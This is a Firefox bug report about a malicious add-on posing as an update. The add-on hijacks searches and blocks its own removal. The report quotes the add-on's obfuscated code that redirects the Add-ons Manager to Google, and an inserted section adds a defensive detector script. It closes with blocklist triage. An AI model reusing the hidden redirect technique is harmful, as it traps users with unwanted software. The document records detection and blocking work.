Closed Bug 1454691 Opened 7 years ago Closed 7 years ago

Malicious add-on redirects away from the add-on page to keep users from uninstalling it

Categories

(Toolkit :: Blocklist Policy Requests, defect)

59 Branch
defect
Not set
major

Tracking

()

RESOLVED FIXED

People

(Reporter: gregory.hunt, Assigned: TheOne)

Details

Attachments

(1 file)

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Build ID: 20180323154952

Steps to reproduce:

A user in my office accidentally installed an add-on that billed itself as a Firefox update, which then hijacked his searches. The add-on itself makes sure you can't go to the add-ons screen in Firefox to remove it, without starting Firefox in safe mode. It seems to me that add-ons shouldn't be able to hijack the add-ons interface in Firefox.

Here is the code it uses to hijack the add-ons page:

    // Character codes of the target URL, stored out of order
    var tArr = [115, 100, 98, 116, 97, 100, 111, 117, 97, 111, 58, 110];
    // Permutation that puts them back in order
    var tArrI = [8, 2, 6, 7, 3, 10, 4, 1, 5, 9, 11, 0];
    var xtraRedirect = "";
    for(var i=0; i<tArr.length; i++) xtraRedirect += String.fromCharCode(tArr[tArrI[i]]);
    // Whenever any tab navigates to the reassembled URL, send it to Google instead
    browser.tabs.onUpdated.addListener(function (tabId, changeInfo, tab) {
      if(changeInfo.url == xtraRedirect){
        browser.tabs.update(tabId, {url: "https://www.google.com/"});
      }
    });

Actual results:

The user clicked on Tools->Add-ons and was redirected to Google.

Expected results:

The add-ons manager for Firefox should have appeared, allowing the user to remove the malicious "Update" add-on.
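The listener quoted above hides its target behind a shuffled array of character codes. As an added example (not code from the bug report or from Mozilla), the script below reverses that shuffle to show what the add-on is keying on, then applies the same idea as a triage heuristic over extension source text: it extracts numeric array literals, tries them as (codes, order) pairs, and flags any that decode to a privileged about: page when the source also hooks tabs.onUpdated and rewrites tab URLs. The sample sources, the privileged-page list and all function names are constructed for this example.

```javascript
// Constructed sample: the two arrays from the add-on code quoted in comment 0.
const SAMPLE_CODES = [115, 100, 98, 116, 97, 100, 111, 117, 97, 111, 58, 110];
const SAMPLE_ORDER = [8, 2, 6, 7, 3, 10, 4, 1, 5, 9, 11, 0];

// Reverse the obfuscation: emit codes[order[i]] as a character for each i.
function decodeShuffledCharCodes(codes, order) {
  if (codes.length !== order.length) throw new RangeError("length mismatch");
  return order
    .map((idx) => {
      if (!Number.isInteger(idx) || idx < 0 || idx >= codes.length) {
        throw new RangeError(`index ${idx} out of range`);
      }
      return String.fromCharCode(codes[idx]);
    })
    .join("");
}

// Assumed list of privileged Firefox pages an extension should never redirect away from.
const PRIVILEGED_PREFIXES = ["about:addons", "about:preferences", "about:config", "about:support"];

// Pull every numeric array literal assigned to a variable out of the source text.
function extractNumericArrays(source) {
  const re = /(?:var|let|const)\s+(\w+)\s*=\s*\[([\d\s,]+)\]/g;
  const arrays = new Map();
  let m;
  while ((m = re.exec(source)) !== null) {
    const values = m[2].split(",").map((s) => s.trim()).filter(Boolean).map(Number);
    arrays.set(m[1], values);
  }
  return arrays;
}

// Heuristic: try every ordered pair of same-length arrays as (codes, order) and
// report decoded strings that name a privileged page.
function findHiddenPrivilegedUrls(source) {
  const arrays = extractNumericArrays(source);
  const hits = [];
  for (const [codesName, codes] of arrays) {
    for (const [orderName, order] of arrays) {
      if (codesName === orderName || codes.length !== order.length) continue;
      // An "order" array must be a set of valid indices into "codes".
      if (!order.every((i) => Number.isInteger(i) && i >= 0 && i < codes.length)) continue;
      const decoded = decodeShuffledCharCodes(codes, order);
      if (PRIVILEGED_PREFIXES.some((p) => decoded.startsWith(p))) {
        hits.push({ codes: codesName, order: orderName, decoded });
      }
    }
  }
  return hits;
}

// The behaviour described in the report: a navigation hook, a URL rewrite, and a
// hidden privileged-page string all present in the same source.
function looksLikeAddonsPageHijack(source) {
  const hooksNavigation = /tabs\.onUpdated\.addListener/.test(source);
  const rewritesUrl = /tabs\.update\s*\(/.test(source);
  return hooksNavigation && rewritesUrl && findHiddenPrivilegedUrls(source).length > 0;
}

// Constructed sample input: the listener quoted in comment 0.
const SAMPLE_SOURCE = `
var tArr = [115, 100, 98, 116, 97, 100, 111, 117, 97, 111, 58, 110];
var tArrI = [8, 2, 6, 7, 3, 10, 4, 1, 5, 9, 11, 0];
var xtraRedirect = "";
for(var i=0; i<tArr.length; i++) xtraRedirect += String.fromCharCode(tArr[tArrI[i]]);
browser.tabs.onUpdated.addListener(function (tabId, changeInfo, tab) {
  if(changeInfo.url == xtraRedirect){
    browser.tabs.update(tabId, {url: "https://www.google.com/"});
  }
});
`;

// Constructed benign sample: hooks navigation but only logs, and hides no URL.
const BENIGN_SOURCE = `
var palette = [255, 128, 0];
browser.tabs.onUpdated.addListener(function (tabId, changeInfo, tab) {
  if (changeInfo.status === "complete") console.log("loaded", tab.url);
});
`;

console.log(decodeShuffledCharCodes(SAMPLE_CODES, SAMPLE_ORDER)); // about:addons
console.log(findHiddenPrivilegedUrls(SAMPLE_SOURCE));
console.log(looksLikeAddonsPageHijack(SAMPLE_SOURCE), looksLikeAddonsPageHijack(BENIGN_SOURCE));
```

The pair search is deliberately cheap: with a handful of small arrays it costs nothing, and a reviewer gets the decoded string plus the variable names involved, which is enough to go straight to the offending listener in the extension source.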
Severity: normal → major
Component: Untriaged → WebExtensions: Untriaged
Product: Firefox → Toolkit
Assignee: nobody → awagner
Status: UNCONFIRMED → ASSIGNED
Component: WebExtensions: Untriaged → Blocklisting
Ever confirmed: true
The add-on GUID is {6ecb9f49-90f0-43a1-8f8a-e809ea4f732b}
Found some related ones:

+--------+----------------------------------------+-----------------+
| id     | guid                                   | Name            |
+--------+----------------------------------------+-----------------+
| 673685 | @googledashboard                       | GoogleDashboard |
| 673890 | @smashdashboard                        | SmashDasboard   |
| 688947 | @smash_tv                              | SmashTV         |
| 689935 | @smash_mov                             | SmashMov        |
| 690271 | @smashmovs                             | Smashmovs       |
| 702315 | @smashtvs                              | Smashtvs        |
| 739853 | @FirefoxUpdate                         | FirefoxUpdate   |
| 946448 | {92b9e511-ac81-4d47-9b8f-f92dc872447e} | Big Searches    |
| 949744 | {3c841114-da8c-44ea-8303-78264edfe60b} | Big Searches    |
| 951089 | {116a0754-20eb-4fe5-bd35-575867a0b89e} | FF Update       |
| 952976 | {6e6ff0fd-4ae4-49ae-ac0c-e2527e12359b} | Big Search      |
| 960408 | {f992ac88-79d3-4960-870e-92c342ed3491} | Update          |
| 960411 | {6ecb9f49-90f0-43a1-8f8a-e809ea4f732b} | Update          |
| 962562 | {a512297e-4d3a-468c-bd1a-f77bd093f925} | NewtabTV        |
| 962894 | {08c28c16-9fb6-4b32-9868-db37c1668f94} | Update          |
| 963453 | {b4ab1a1d-e137-4c59-94d5-4f509358a81d} | Update          |
| 963455 | {feedf4f8-08c1-451f-a717-f08233a64ec9} | Update          |
+--------+----------------------------------------+-----------------+

Andreas, please stage these blocks when the staged blocks in bug 1423384 are cleared.
Flags: needinfo?(awagner)
(In reply to gregory.hunt from comment #0)
> It seems to me that add-ons shouldn't be able to hijack the add-ons interface in Firefox.

I agree, which is why I placed this in Webextensions. Andreas, an explanation would be welcome.

Add-ons are prevented from interfering with Mozilla sites like addons.mozilla.org, so I would think preventing them from interfering with the Add-ons Manager would be both possible and desirable. This blocklisting game of whack-a-mole is less than ideal.
(In reply to Gingerbread Man from comment #3)
> (In reply to gregory.hunt from comment #0)
> > It seems to me that add-ons shouldn't be able to hijack the add-ons interface in Firefox.
>
> I agree, which is why I placed this in Webextensions. Andreas, an
> explanation would be welcome.

I think Jorge or Mike Conca can provide a more authoritative answer on whether we'd want to do that or now. Personally, I would be in favor of it, but it's not my call.

This is also getting a little bit off-topic for this bug, maybe you can take it to dev-addons or open a separate bug?
Ooops, that should have been "...on whether we'd want to do that or not."
Flags: needinfo?(awagner)
Philipp, the block has been staged, could you please review and push?
Flags: needinfo?(philipp)
Philipp approved it. The block is live.
Status: ASSIGNED → RESOLVED
Closed: 7 years ago
Resolution: --- → FIXED
(In reply to Andreas Wagner [:TheOne] [use NI] from comment #4)
> open a separate bug?

Bug 1455350
Flags: needinfo?(philipp)